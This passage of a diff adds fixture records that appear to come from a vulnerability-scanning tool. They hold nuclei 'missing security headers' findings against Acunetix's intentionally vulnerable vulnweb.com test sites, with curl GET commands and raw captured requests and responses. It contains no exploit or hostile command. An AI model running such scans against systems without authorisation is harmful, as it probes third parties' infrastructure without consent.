"tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 497, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:41:14.960Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(41) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 498, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:41:15.111Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:46 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 499, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "discovered_date": "2024-11-13T02:41:15.250Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.carousel HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 NOT FOUND\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 500, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:41:15.393Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:56 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 501, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:15.533Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 308 PERMANENT REDIRECT\r\nConnection: close\r\nContent-Length: 253\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nLocation: http://localhost/admin/\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to target URL: <a href="http://localhost/admin/">http://localhost/admin/</a>. If not click the link.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 502, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "discovered_date": "2024-11-13T02:41:15.676Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:202 HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 503, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:41:15.823Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 504, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: 